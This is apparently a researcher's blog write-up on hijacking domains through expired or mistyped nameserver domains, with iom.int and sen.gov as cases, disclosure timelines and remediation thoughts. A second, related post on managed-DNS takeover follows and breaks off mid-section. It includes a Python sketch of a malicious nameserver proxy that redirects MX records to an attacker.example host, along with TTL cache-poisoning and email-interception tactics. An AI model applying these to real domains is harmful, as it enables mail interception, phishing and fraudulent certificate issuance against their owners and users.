In a past piece of research, we explored how an expired nameserver domain could let us take full control of a target domain. In that example we took over the domain name maris.int by buying an expired domain name which was authoritative for it. That domain happened to have two broken nameservers, one being misconfigured and the other being an expired domain name. Due to this combination of issues the domain was totally inaccessible (until I bought the expired domain and restored/rehosted the old website). While this made it easier to take full control of the domain’s DNS (since most clients will automatically fail over to the working nameserver(s)), it also raises an important question. Are there other domains where only some of the nameservers are not working because they rely on an expired domain name or suffer from some other takeover vulnerability? After all, as discussed in previous posts, there are many different ways for a nameserver to become vulnerable to takeover.

A Few Bad Nameservers

In an effort to find a proof-of-concept domain which suffered from having just a few of its nameservers vulnerable to takeover, I had to turn back to scanning the Internet. Luckily, since we have an old copy of the .int zone we can start there. After iterating through this list I was able to find yet another vulnerable .int domain: iom.int. This website is totally functional and working, but two of its nameservers are actually expired domain names. Interestingly enough, unless you traverse the DNS tree you likely won’t even notice this issue. For example, here’s the output for an NS query against iom.int:

mandatory@script-srchttpsyvgscript ~> dig NS iom.int

; <<>> DiG 9.8.3-P1 <<>> NS iom.int
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 9316
;; flags: qr rd ra; QUERY: 1, ANSWER: 2, AUTHORITY: 0, ADDITIONAL: 0

;; QUESTION SECTION:
;iom.int.            IN    NS

;; ANSWER SECTION:
iom.int.        86399    IN    NS    ns1.gva.ch.colt.net.
iom.int.        86399    IN    NS    ns1.zrh1.ch.colt.net.

;; Query time: 173 msec
;; SERVER: 8.8.8.8#53(8.8.8.8)
;; WHEN: Thu Dec  8 14:12:47 2016
;; MSG SIZE  rcvd: 81

As we can see from the above output we’ve asked the resolver 8.8.8.8 (Google’s public resolver) for the nameservers of iom.int and it has returned ns1.zrh1.ch.colt.net. and ns1.gva.ch.colt.net. with NOERROR as the status. The domain name colt.net is not available for registration – it is currently registered, working, and returning DNS records as expected. If this is the case, how is this domain vulnerable? It turns out that we are being slightly misled due to the way that dig works. Let’s break down what is happening with dig’s +trace flag:

mandatory@script-srchttpsyvgscript ~> dig iom.int +trace

; <<>> DiG 9.8.3-P1 <<>> iom.int +trace
;; global options: +cmd
.            209756    IN    NS    g.root-servers.net.
.            209756    IN    NS    m.root-servers.net.
.            209756    IN    NS    i.root-servers.net.
.            209756    IN    NS    l.root-servers.net.
.            209756    IN    NS    f.root-servers.net.
.            209756    IN    NS    b.root-servers.net.
.            209756    IN    NS    c.root-servers.net.
.            209756    IN    NS    h.root-servers.net.
.            209756    IN    NS    d.root-servers.net.
.            209756    IN    NS    k.root-servers.net.
.            209756    IN    NS    j.root-servers.net.
.            209756    IN    NS    e.root-servers.net.
.            209756    IN    NS    a.root-servers.net.
;; Received 228 bytes from 172.16.0.1#53(172.16.0.1) in 30 ms

int.            172800    IN    NS    ns.icann.org.
int.            172800    IN    NS    ns1.cs.ucl.ac.uk.
int.            172800    IN    NS    ns.uu.net.
int.            172800    IN    NS    ns0.ja.net.
int.            172800    IN    NS    sec2.authdns.ripe.net.
;; Received 365 bytes from 192.5.5.241#53(192.5.5.241) in 88 ms

iom.int.        86400    IN    NS    ns1.iom.org.ph.
iom.int.        86400    IN    NS    ns2.iom.org.ph.
iom.int.        86400    IN    NS    ns1.gva.ch.colt.net.
iom.int.        86400    IN    NS    ns1.zrh1.ch.colt.net.
;; Received 127 bytes from 128.86.1.20#53(128.86.1.20) in 353 ms

iom.int.        86400    IN    A    54.154.14.101
iom.int.        86400    IN    NS    ns1.zrh1.ch.colt.net.
iom.int.        86400    IN    NS    ns1.gva.ch.colt.net.
;; Received 97 bytes from 212.74.78.22#53(212.74.78.22) in 172 ms

This shows us dig’s process as it traverses the DNS tree. First we can see it asks the root nameservers for the nameservers of the .int TLD. This gives us results like ns.icann.org, ns1.cs.ucl.ac.uk, etc. Next, dig asks one of the returned .int nameservers at random for the nameservers of our target iom.int domain. As we can see from this output, there are actually more nameservers which the .int TLD nameservers are recommending to us. However, despite dig receiving these nameservers it hasn’t yet gotten what it’s looking for. dig will continue down the delegation chain until it gets an authoritative response. Since the .int TLD nameservers are not authoritative for the iom.int zone they don’t set the authoritative answer flag on the DNS response. DNS servers are supposed to set the authoritative answer flag when they are the owner of a specific zone. This is DNS’s way of saying “stop traversing the DNS tree, I’m the owner of the zone you’re looking for – ask me!”. Completing the walk, dig picks one of the nameservers returned by the .int TLD nameservers at random and asks it for the nameservers of the iom.int domain. Since these nameservers are authoritative for the iom.int zone, dig takes this answer and returns it to us. Interestingly enough, if dig had encountered one of the non-working nameservers, specifically ns1.iom.org.ph or ns2.iom.org.ph, it would simply have failed over to one of the working colt.net nameservers without letting us know.
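
To make the walk dig performs above more concrete, here is a rough sketch of the same traversal in Python, assuming the dnspython 2.x library and the hardcoded root server IP below; it follows referrals until it receives a response with the authoritative answer (AA) flag set, which is exactly where dig’s +trace stops as well.

# A minimal sketch of walking the DNS delegation chain by hand (assumes
# dnspython 2.x, installed via "pip install dnspython").
import dns.flags
import dns.message
import dns.query
import dns.rdatatype
import dns.resolver

def walk_delegation(domain, server="198.41.0.4"):  # a.root-servers.net
    """Follow NS referrals until a server answers with the AA flag set."""
    while True:
        query = dns.message.make_query(domain, dns.rdatatype.NS)
        response = dns.query.udp(query, server, timeout=5)
        if response.flags & dns.flags.AA:
            # This server owns the zone - the same point where dig stops.
            print(f"{server} answered authoritatively:")
            for rrset in response.answer or response.authority:
                print(rrset.to_text())
            return response
        # Not authoritative: the NS records in the authority section are a
        # referral, so pick the first one and continue the walk from there.
        referrals = [item.target.to_text()
                     for rrset in response.authority
                     if rrset.rdtype == dns.rdatatype.NS
                     for item in rrset]
        print(f"{server} referred us to: {referrals}")
        server = next(iter(dns.resolver.resolve(referrals[0], "A"))).address

walk_delegation("iom.int.")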

Domain Availability, Registry Truth & Sketchy DNS Configurations

Note: This is an aside from the main topic, feel free to skip this section if you don’t want to read about .org.ph DNS sketchiness.

When I initially scanned for this vulnerability using some custom software I’d written, I received an alert that iom.org.ph was available for registration. However when I queried for the domain using dig I found something very odd:

mandatory@script-srchttpsyvgscript ~> dig A iom.org.ph 

; <<>> DiG 9.8.3-P1 <<>> A iom.org.ph
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 18334
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 0

;; QUESTION SECTION:
;iom.org.ph.        IN    A

;; ANSWER SECTION:
iom.org.ph.    299    IN    A    45.79.222.138

;; Query time: 54 msec
;; SERVER: 172.16.0.1#53(172.16.0.1)
;; WHEN: Sat Dec 17 23:35:00 2016
;; MSG SIZE  rcvd: 51

The above query shows that when we look up the A record (IP address) for iom.org.ph we get a valid IP back. So, wait, iom.org.ph is actually responding with a valid record? How are we getting an A record back if the domain doesn’t exist? Things get even weirder when you ask what the nameservers are for the domain:

mandatory@script-srchttpsyvgscript ~> dig NS iom.org.ph 

; <<>> DiG 9.8.3-P1 <<>> NS iom.org.ph
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 18589
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 0

;; QUESTION SECTION:
;iom.org.ph.        IN    NS

;; AUTHORITY SECTION:
ph.            899    IN    SOA    ph-tld-ns.dot.ph. sysadmin.domains.ph. 2016121814 21600 3600 2592000 86400

;; Query time: 60 msec
;; SERVER: 172.16.0.1#53(172.16.0.1)
;; WHEN: Sat Dec 17 23:34:50 2016
;; MSG SIZE  rcvd: 102

According to dig, no nameservers are returned for our domain despite us getting an A record back just a moment ago. How can this be? After trying this query I was even less confident that the domain was available at all, so I issued the following query to sanity check myself:

mandatory@script-srchttpsyvgscript ~> dig A ThisCantPossiblyExist.org.ph

; <<>> DiG 9.8.3-P1 <<>> A ThisCantPossiblyExist.org.ph
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 65010
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 0

;; QUESTION SECTION:
;ThisCantPossiblyExist.org.ph.    IN    A

;; ANSWER SECTION:
ThisCantPossiblyExist.org.ph. 299 IN    A    45.79.222.138

;; Query time: 63 msec
;; SERVER: 172.16.0.1#53(172.16.0.1)
;; WHEN: Sat Dec 17 23:39:24 2016
;; MSG SIZE  rcvd: 62

Ok, so apparently all .org.ph domains which don’t exist return an A record. What in the world is at that IP?! The following is a screenshot of what we get when we go to ThisCantPossiblyExist.org.ph:

[Screenshot: the page served for ThisCantPossiblyExist.org.ph]

The above makes it fairly clear what’s happening. Instead of simply failing to resolve, the .org.ph TLD nameservers return an A record pointing to a page filled with questionable advertisements as well as a notice that says “This domain is available to be registered”. Likely this is to make a little extra money from people attempting to visit non-existent domains. I’ll refrain from commenting on the ethics or sketchiness of this tactic and stick to how you can detect this with dig. The following query reveals how this is set up:

mandatory@script-srchttpsyvgscript ~> dig ANY '*.org.ph'

; <<>> DiG 9.8.3-P1 <<>> ANY *.org.ph
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 51271
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 0

;; QUESTION SECTION:
;*.org.ph.            IN    ANY

;; ANSWER SECTION:
*.org.ph.        299    IN    A    45.79.222.138

;; Query time: 50 msec
;; SERVER: 172.16.0.1#53(172.16.0.1)
;; WHEN: Sat Dec 17 23:49:15 2016
;; MSG SIZE  rcvd: 42

The above query shows that there is a wildcard A record set up for anything matching *.org.ph, which is why we saw this behaviour.
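
If you want to check for this kind of wildcard programmatically rather than eyeballing dig output, a rough approach (a sketch assuming dnspython 2.x) is to resolve a random label that cannot plausibly be registered and see whether an A record comes back anyway:

# A small sketch of detecting a wildcard record under a suffix such as org.ph
# (assumes dnspython 2.x). If a random, surely-unregistered label still
# resolves to an A record, a wildcard is almost certainly in place.
import secrets
import dns.resolver

def has_wildcard(suffix):
    probe = f"{secrets.token_hex(16)}.{suffix}"
    try:
        answer = dns.resolver.resolve(probe, "A")
        ips = sorted(rr.address for rr in answer)
        print(f"{probe} resolved to {ips} - {suffix} likely has a wildcard record")
        return True
    except (dns.resolver.NXDOMAIN, dns.resolver.NoAnswer):
        print(f"{probe} did not resolve - no wildcard detected for {suffix}")
        return False

has_wildcard("org.ph")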

For an additional sanity check, one powerful tool which is always useful is historical data on domains. One of the largest collectors of historical DNS, WHOIS, and general Internet data that I know of is DomainTools. After reaching out they were kind enough to provide a researcher account for me, so I used their database to get the full story of vulnerabilities such as this one. Querying their dataset we can understand when exactly this iom.org.ph domain became vulnerable (expired) in the first place.

[Screenshot: historical WHOIS data for iom.org.ph from DomainTools]

Interestingly enough, this historical data shows that this domain has likely been expired since 2013. The fact that this issue could have existed for this long shows that this type of vulnerability is subtle enough to go unnoticed for a long time (~4 years!). Crazy.

Back to the Takeover

Moving back to our takeover: once I realized that iom.org.ph was indeed available I was able to register it and become an authoritative nameserver for iom.int. This is similar to the maris.int example but with an interesting caveat. When someone attempts to visit iom.int there is about a 50% chance that our nameservers will be queried instead of the authentic ones. The reason for this is Round Robin DNS, a technique used in DNS to distribute load across multiple servers. The concept is fairly simple: in DNS you can return multiple records for a query if you want to distribute the load across a few servers. Since you want to distribute load evenly, you return these records in a random order so that querying clients will choose a different record each time they ask. In the case of a DNS A record this would mean that if you returned three IP addresses in a random order, you should see each IP address used by your users roughly 33.33% of the time. We can see this in action if we attempt a few NS queries for iom.int directly against the .int TLD nameservers. We get the .int TLD nameservers by doing the following:

mandatory@script-srchttpsyvgscript ~> dig NS int.

; <<>> DiG 9.8.3-P1 <<>> NS int.
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 54471
;; flags: qr rd ra; QUERY: 1, ANSWER: 5, AUTHORITY: 0, ADDITIONAL: 0

;; QUESTION SECTION:
;int.                IN    NS

;; ANSWER SECTION:
int.            52121    IN    NS    ns.uu.net.
int.            52121    IN    NS    ns.icann.org.
int.            52121    IN    NS    ns0.ja.net.
int.            52121    IN    NS    ns1.cs.ucl.ac.uk.
int.            52121    IN    NS    sec2.authdns.ripe.net.

;; Query time: 38 msec
;; SERVER: 172.16.0.1#53(172.16.0.1)
;; WHEN: Sun Dec 18 00:23:29 2016
;; MSG SIZE  rcvd: 153

We’ll pick one of these at random (ns.uu.net) and ask for the nameservers of iom.int a few times:

mandatory@script-srchttpsyvgscript ~> dig NS iom.int @ns.uu.net.

; <<>> DiG 9.8.3-P1 <<>> NS iom.int @ns.uu.net.
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 41151
;; flags: qr rd; QUERY: 1, ANSWER: 0, AUTHORITY: 4, ADDITIONAL: 0
;; WARNING: recursion requested but not available

;; QUESTION SECTION:
;iom.int.            IN    NS

;; AUTHORITY SECTION:
iom.int.        86400    IN    NS    ns1.iom.org.ph.
iom.int.        86400    IN    NS    ns1.gva.ch.colt.net.
iom.int.        86400    IN    NS    ns2.iom.org.ph.
iom.int.        86400    IN    NS    ns1.zrh1.ch.colt.net.

;; Query time: 76 msec
;; SERVER: 137.39.1.3#53(137.39.1.3)
;; WHEN: Sun Dec 18 00:23:35 2016
;; MSG SIZE  rcvd: 127

mandatory@script-srchttpsyvgscript ~> dig NS iom.int @ns.uu.net.

; <<>> DiG 9.8.3-P1 <<>> NS iom.int @ns.uu.net.
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 14215
;; flags: qr rd; QUERY: 1, ANSWER: 0, AUTHORITY: 4, ADDITIONAL: 0
;; WARNING: recursion requested but not available

;; QUESTION SECTION:
;iom.int.            IN    NS

;; AUTHORITY SECTION:
iom.int.        86400    IN    NS    ns1.gva.ch.colt.net.
iom.int.        86400    IN    NS    ns2.iom.org.ph.
iom.int.        86400    IN    NS    ns1.zrh1.ch.colt.net.
iom.int.        86400    IN    NS    ns1.iom.org.ph.

;; Query time: 79 msec
;; SERVER: 137.39.1.3#53(137.39.1.3)
;; WHEN: Sun Dec 18 00:23:36 2016
;; MSG SIZE  rcvd: 127

mandatory@script-srchttpsyvgscript ~> dig NS iom.int @ns.uu.net.

; <<>> DiG 9.8.3-P1 <<>> NS iom.int @ns.uu.net.
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 31489
;; flags: qr rd; QUERY: 1, ANSWER: 0, AUTHORITY: 4, ADDITIONAL: 0
;; WARNING: recursion requested but not available

;; QUESTION SECTION:
;iom.int.            IN    NS

;; AUTHORITY SECTION:
iom.int.        86400    IN    NS    ns2.iom.org.ph.
iom.int.        86400    IN    NS    ns1.zrh1.ch.colt.net.
iom.int.        86400    IN    NS    ns1.gva.ch.colt.net.
iom.int.        86400    IN    NS    ns1.iom.org.ph.

;; Query time: 87 msec
;; SERVER: 137.39.1.3#53(137.39.1.3)
;; WHEN: Sun Dec 18 00:23:37 2016
;; MSG SIZE  rcvd: 127

As can be seen above, each time we ask we get the nameservers in a different order. This is the beauty of round robin DNS: each nameserver will receive a roughly equal share of DNS queries. However, this complicates our attack because half of the time users will be querying the legitimate nameservers! So the question now becomes: how can we tip the odds in our favor?
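
To put rough numbers on that rotation, here is a small sketch (again assuming dnspython 2.x, and using ns.uu.net’s IP from the output above) that repeats the NS query and tallies which nameserver is listed first; over enough queries each of the four should lead roughly a quarter of the time:

# A rough sketch of measuring the round robin rotation shown above (assumes
# dnspython 2.x). Ask ns.uu.net for the iom.int NS set many times and count
# which record comes back first; dnspython generally preserves wire order.
from collections import Counter
import dns.message
import dns.query
import dns.rdatatype

TLD_SERVER = "137.39.1.3"  # ns.uu.net, taken from the dig output above
first_seen = Counter()

for _ in range(200):
    query = dns.message.make_query("iom.int.", dns.rdatatype.NS)
    response = dns.query.udp(query, TLD_SERVER, timeout=5)
    # The TLD server is not authoritative for iom.int, so the NS set comes
    # back as a referral in the authority section, not the answer section.
    ns_rrset = [r for r in response.authority if r.rdtype == dns.rdatatype.NS][0]
    first_seen[list(ns_rrset)[0].target.to_text()] += 1

for nameserver, count in first_seen.most_common():
    print(f"{nameserver} listed first {count} times")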

May the RR Odds Be Ever in Our Favor

So, we can’t control the behaviour of the .int TLD servers and we’ll only be chosen approximately 50% of the time. As an attacker we need to figure out how to make that closer to 100%. Luckily, due to how DNS is structured, we can get very close.

When you visit www.google.com and your computer does a DNS lookup for that record, it likely isn’t going to traverse the entire DNS tree to get the result. Instead it likely makes use of a DNS resolver which performs this process on your behalf while caching all of the results. This resolver is assigned to your computer during the DHCP process and can be either a large shared resolver (such as 8.8.8.8 or 8.8.4.4) or a small resolver hosted on your local router or computer. The idea behind the resolver is that it can serve many clients making DNS requests and can speed up resolution by caching results. So if one client looks up www.google.com and shortly after another client does the same, the DNS tree doesn’t have to be traversed because the resolver already has a cached copy. The important point to realize here is that in DNS, caching is king. The side effects of this architecture become more apparent during events like the DDoS attacks against Dyn, which knocked the Internet offline for millions of users. As it turns out, when you put all your eggs in one basket, you’d better be sure the basket can hold up.

Caching is accomplished by DNS resolvers temporarily storing the results of a DNS query for however long the response’s TTL has been set to. This means that if a response has a TTL of 120, for example, the caching resolver will likely obey this and return the same record for two minutes. There are upper limits to this value, but they’re resolver-dependent, and a TTL as long as a week can likely be set without problems.

Given this situation, we can win this game by setting longer TTLs than the legitimate servers for all of our authoritative responses. The situation essentially boils down into this (a small simulation of the resulting odds follows the list):

  • User looks up the A record for iom.int to visit the site.
  • Due to the random ordering of nameservers in the .int TLD NS query results, the user has a 50% chance of choosing our poisoned nameserver.
  • Say the user doesn’t choose us and gets the legitimate nameservers; their resolver will record this result and cache it for the specified TTL of 21,745 seconds (approximately 6 hours), which is the current TTL for this record at the time of this writing.
  • Later on, the user attempts to visit the website after more than 6 hours have passed. Again they traverse this tree, but this time they get one of our malicious nameservers which we’ve taken over. We reply with a TTL of 604,800 seconds (one week), or an even longer TTL depending on what we think we can get away with. The user’s resolver caches this value and will hold it for the length of the TTL we specified.
  • Now, for an entire week, the user (and, more importantly, all the other clients of that resolver) will always use our falsified record.
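
As a back-of-the-envelope illustration of why the TTL asymmetry matters, here is a toy simulation (plain Python, with the TTLs from above and an assumed 50/50 nameserver pick) of how often a single resolver cache ends up holding our records:

# A toy simulation of the cache poisoning odds described in the list above.
# Each time the resolver's cached record expires it re-queries, and thanks to
# round robin it lands on our malicious nameserver roughly 50% of the time.
# The legitimate servers hand out a ~6 hour TTL; we hand out a 1 week TTL.
import random

LEGIT_TTL = 21_745        # seconds (~6 hours), per the record observed above
MALICIOUS_TTL = 604_800   # seconds (1 week)
SIMULATED_SECONDS = 60 * 60 * 24 * 90  # simulate 90 days of cache churn

def simulate(trials=200):
    fractions = []
    for _ in range(trials):
        now, poisoned_time = 0, 0
        while now < SIMULATED_SECONDS:
            if random.random() < 0.5:   # resolver happened to pick our nameserver
                poisoned_time += MALICIOUS_TTL
                now += MALICIOUS_TTL
            else:                       # resolver picked a legitimate nameserver
                now += LEGIT_TTL
        fractions.append(poisoned_time / now)
    return sum(fractions) / trials

print(f"~{simulate():.0%} of the time the resolver serves our poisoned records")

With these TTLs the resolver ends up serving our records roughly 96% of the time, even though we only win the coin flip half of the time it re-queries.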

This example becomes more extreme when you realize that many people and services make use of large resolvers like Google’s public resolvers (8.8.8.8, 8.8.4.4) or Dyn’s (216.146.35.35, 216.146.36.36). At this scale it’s only a matter of time until the resolver picks our poisoned nameservers and we can poison all clients of that resolver (potentially millions) for a long period of time. Even better, with large resolvers we can easily test to see if we’ve succeeded and can act quickly once we know we’ve poisoned the community cache.

The Power of DNS

So, we can now poison the DNS for our target – but what power does this give us? What can we do with our newly gained privileges?

  • Issue arbitrary SSL/TLS certificates for iom.int: Because many certificate authorities allow either DNS, HTTP, or email for domain name verification, we can easily set DNS records for servers we control to prove we own the target domain. Even if the CA chooses our target’s nameservers instead of ours, we can simply request again once the cache expires, until it eventually asks our malicious nameservers. This assumes the certificate authority’s certificate issuing system actually performs caching – if it doesn’t, we can simply try again immediately until our malicious servers are picked.
  • Targeted Email Interception: Since we can set MX records for our targets, we can set up our malicious servers to watch for DNS requests from specific targets like GMail, Yahoo Mail, or IANA’s mail servers and selectively lie about where to route email. This gives us the benefit of stealth because we can give legitimate responses to everyone querying except for the targets we care about.
  • Takeover of the .int Domain Name Itself: In the case of the .int TLD, if we want to change the owners or the nameservers of this domain at the registry, both the Administrative contact and the Technical contact must approve the change (assuming the policy is the same as IANA’s policy for root nameserver changes, which IANA also manages). You can see the example form here on IANA’s website. Since both of the email addresses on the WHOIS are at iom.int as well, we have the ability to intercept mail for both. We can now wait until we see an MX DNS request from IANA’s IP range and selectively poison the results to redirect the email to our servers, allowing us to send and receive emails as the admin. Testing whether IANA’s mail servers have been poisoned can be achieved by spoofing emails from iom.int and checking if the bounce email is redirected to our malicious mail servers. If we don’t receive it we simply wait until the TTL of the legitimate mail servers expires and try again.
  • Easily Phish Credentials: Since we can change DNS we can rewrite the A records to point to our own phishing servers in order to steal employee credentials/etc.
  • MITM Devices via SRV Spoofing: Since we can also control SRV records, we can change these to force embedded devices to connect to our servers instead. This goes for any service which uses DNS for routing (assuming no other validation method is built into the protocol).
  • And much more…

So clearly this is a vulnerability which can occur, but does it occur often? Sure, maybe one random .int website has this vulnerability, but do any actually important websites suffer from this issue?

Not An Isolated Incident

The following is a screenshot from another website which was found to suffer from this same vulnerability as iom.int. This time from something as simple as a typo in the nameserver hostname:

[Screenshot: the sen.gov URL shortener]

The vulnerable domain was sen.gov, an internal URL shortening service for the United States Senate. The domain had the non-existent domain ns1-201-akam.net set as an authoritative nameserver. This was likely a typo of ns1-201.akam.net, a sub-domain belonging to Akamai, and this slight mistype caused a massive security issue exactly where you want it the least. Since the site’s very purpose is to redirect what are presumably members of the US Senate to arbitrary sites from links sent by other members, it would be a goldmine for an attacker wishing to do malicious DNS-based redirection for drive-by exploitation or targeted phishing attacks. Due to the high risk and trivial exploitability of the issue, I purchased the nameserver domain myself and simply blocked DNS traffic to it (allowing the DNS queries to fail over to the remaining working servers). This essentially “plugged” the issue until it could be fixed by the administrators of the site. Shortly after this I reached out to the .gov registry, who forwarded my concerns to the site’s administrators, who fixed the issue extremely quickly (see disclosure timeline below). All said and done, a very impressive response time! This does, however, highlight that this type of issue can happen to anyone. In addition to the two examples outlined here, many more exist which are not listed (for obvious reasons), demonstrating that this is not an isolated issue.

Disclosure Timeline

International Organization for Migration (iom.int) Disclosure

  • Dec 09, 2016: Contacted ocu@ with a request to disclose this issue (contact seemed appropriate per their website).
  • Dec 23, 2016: Due to lack of response forwarded previous email to WHOIS contacts.
  • Dec 23, 2016: Received response from Jackson (Senior Information Security Officer for iom.int) apologizing for missing the earlier email and requesting details of the problem.
  • Dec 23, 2016: Disclosed issue via email.
  • Dec 23, 2016: Confirmed receipt of issue, stating that the problem and implications are understood. States that it will be addressed internally and that an update will be sent when it has been fixed.
  • Dec 27, 2016: Update received from Jackson stating that IANA has been contacted and instructed to remove any reference to the domain iom.org.ph in order to remediate the vulnerability. IANA states that this can take up to five business days to accomplish.
  • Dec 27, 2016: Asked if Jackson would also like the iom.org.ph domain name back or if it should be left to expire.
  • Dec 27, 2016: Jackson confirms the domain name is no longer needed and it’s fine to let it expire.

Disclosure Notes: I got a quick response once I forwarded the info to the correct contacts; I should’ve gone for the broader CC with this disclosure and will have to keep that in mind for future disclosures. I didn’t expect such a quick response (or even a dedicated security person), so it was a nice surprise to have Jackson jump on the problem so fast.

United States Senate (sen.gov) Disclosure

  • January 5, 2017: Reached out to .gov registry requesting responsible disclosure and offering PGP.
  • January 6, 2017: Response received from help desk stating they can forward any concerns to the appropriate contacts if needed.
  • January 6, 2017: Disclosed issue to help desk.
  • January 8, 2017: Nameserver patch applied, all nameservers are now correctly set!

Disclosure Notes: Again, I didn’t expect a quick patch like this and was blown away by how quickly this was fixed (less than two days!). In the past, getting government agencies I’ve reported vulnerabilities to actually apply a patch has been a super slow process, so this was a breath of fresh air. Really impressed!

Judas DNS – A Tool For Exploiting Nameserver Takeovers

In order to make the process of exploiting this unique type of vulnerability easier, I’ve created a proof-of-concept malicious authoritative nameserver which can be used once you’ve taken over a target’s nameserver. The Judas server proxies all DNS requests to the configured legitimate authoritative nameservers while also respecting a custom ruleset to modify DNS responses when certain rule-matching criteria are met. For more information on how it works, as well as the full source code, see the link below:
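
As a rough illustration of the general idea (this is a simplified sketch, not Judas’s actual code or configuration format), a malicious authoritative server of this kind is essentially a DNS proxy with a rule hook bolted on. Something like the following, assuming dnspython 2.x; the target network and injected MX record below are hypothetical placeholders:

# A simplified sketch of the proxying idea behind a tool like Judas DNS
# (assumes dnspython 2.x; not Judas's own code). Every query is forwarded to
# the real authoritative server, and only responses matching a rule are
# modified - here, MX lookups coming from one hypothetical source network.
import socketserver
import dns.message
import dns.query
import dns.rdatatype
import dns.rrset

LEGIT_AUTHORITATIVE = "212.74.78.22"    # a working iom.int nameserver (colt.net)
TARGET_SOURCE_PREFIX = "192.0.2."       # hypothetical "only poison these clients"
ROGUE_MX = "10 mail.attacker.example."  # hypothetical record we want to inject

class JudasLikeHandler(socketserver.BaseRequestHandler):
    def handle(self):
        wire, sock = self.request
        query = dns.message.from_wire(wire)
        # Proxy the query to the legitimate authoritative server.
        response = dns.query.udp(query, LEGIT_AUTHORITATIVE, timeout=5)
        question = query.question[0]
        if (self.client_address[0].startswith(TARGET_SOURCE_PREFIX)
                and question.rdtype == dns.rdatatype.MX):
            # Rule matched: swap in our own MX answer, leave everything else alone.
            response.answer = [dns.rrset.from_text(
                question.name, 604800, "IN", "MX", ROGUE_MX)]
        sock.sendto(response.to_wire(), self.client_address)

if __name__ == "__main__":
    # Binding port 53 requires root (or an equivalent capability).
    with socketserver.UDPServer(("0.0.0.0", 53), JudasLikeHandler) as server:
        server.serve_forever()

The selective-response trick here is the same one described in the email interception scenario above: everyone else gets the genuine answers, so the takeover stays quiet.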

Judas DNS Github

Closing Thoughts

This vulnerability has all the trademarks of a dangerous security issue. Not only is it an easy mistake to make via a typo or an expired nameserver domain, it also does not present any immediately obvious availability problems due to the failover behaviour of many DNS clients. This means that not only can it happen to anyone, it can also go unnoticed for a long time.

On the topic of remediation, this issue is interesting because it could possibly be mitigated at the TLD level. If TLD operators did simple DNS health checks to ensure that all domain nameservers had at least the possibility of working (e.g. occasionally doing a simple A lookup to check whether an IP address is returned, or looking for NXDOMAIN), they could likely prevent this class of hijacking altogether. However, I suspect this would be a heavy-handed thing for TLDs to take on and could potentially be prone to error (what about nameservers that only serve private/internal network clients?). After all, if a TLD were to automatically remove nameservers of suspected vulnerable domains and it caused an outage, there would certainly be hell to pay. Still, there is definitely an interesting discussion to be had on how to fix these vulnerabilities at scale.

Credit

Thanks to @Baloo and @kalou000 at Gandi.net for being extremely helpful resources on DNS/Internet-related information. Not many people can quote obscure DNS functionality off-hand, so being able to bounce ideas off of them was invaluable. Thanks as well for providing enterprise access to their domain-checking API for security research purposes (such as this project!). This was amazing for checking domain existence because Gandi (as far as I’m aware) has the largest TLD support of any registrar, so they were perfect for this research (Nicaragua? Philippines? Random country in Africa? Yep, TLD supported).

Until next time,

-mandatory

Recently, I found that Digital Ocean suffered from a security vulnerability in their domain import system which allowed for the takeover of 20K domain names. If you haven’t given that post a read I recommend doing so before going through this write-up. Originally I had assumed that this issue was specific to Digital Ocean, but as I’ve now learned this couldn’t be further from the truth. It turns out this vulnerability affects just about every popular managed DNS provider on the web. If you run a managed DNS service, it likely affects you too.

The Managed DNS Vulnerability

The root of this vulnerability is that a managed DNS provider allows someone to add a domain to their account without any verification of ownership of the domain name itself. This is actually an incredibly common flow and is used in cloud services such as AWS, Google Cloud, Rackspace and, of course, Digital Ocean. The issue occurs when a domain name is used with one of these cloud services and the zone is later deleted without also changing the domain’s nameservers. This means that the domain is still fully set up for use with the cloud service but has no account with a zone file to control it. In many cloud providers this means that anyone can create a DNS zone for that domain and take full control over it, allowing an attacker to set up a website, issue SSL/TLS certificates, host email, etc. Worse yet, after combining the results from the various providers affected by this problem, over 120,000 domains were vulnerable (likely many more).

Detecting Vulnerable Domains via DNS

Detecting this vulnerability is a fairly interesting process: it can be enumerated via a simple DNS NS query run against the target’s nameservers. If the domain is vulnerable, the nameservers will return either a SERVFAIL or a REFUSED DNS error. The following is an example query using the dig DNS tool:

ubuntu@ip-172-30-0-49:~/$ dig NS zz[REDACTED].net

; <<>> DiG 9.9.5-3ubuntu0.8-Ubuntu <<>> NS zz[REDACTED].net
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: SERVFAIL, id: 62335
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;zz[REDACTED].net.                 IN      NS

;; Query time: 73 msec
;; SERVER: 172.30.0.2#53(172.30.0.2)
;; WHEN: Sat Sep 17 16:46:30 PDT 2016
;; MSG SIZE  rcvd: 42

The above response shows we’ve received a DNS SERVFAIL error indicating that this domain is vulnerable.

If we get a SERVFAIL response, how are we supposed to know what the actual nameservers for this domain are? Actually, dig has already found the domain’s nameservers but just hasn’t displayed them to us. DNS queries for a domain’s nameservers usually follow this process:

  • Query the DNS root nameservers for the list of nameservers belonging to the domain’s TLD (in this case, .net).
  • Query one of the nameservers for the specified TLD of the domain for the nameservers of the domain.
  • Query the nameservers returned for the domain for the domain’s nameservers (it’s unclear why dig does this, considering it already has the answer from the .net nameservers).

*Note that many of these steps will be skipped if the results are already cached by your resolver.

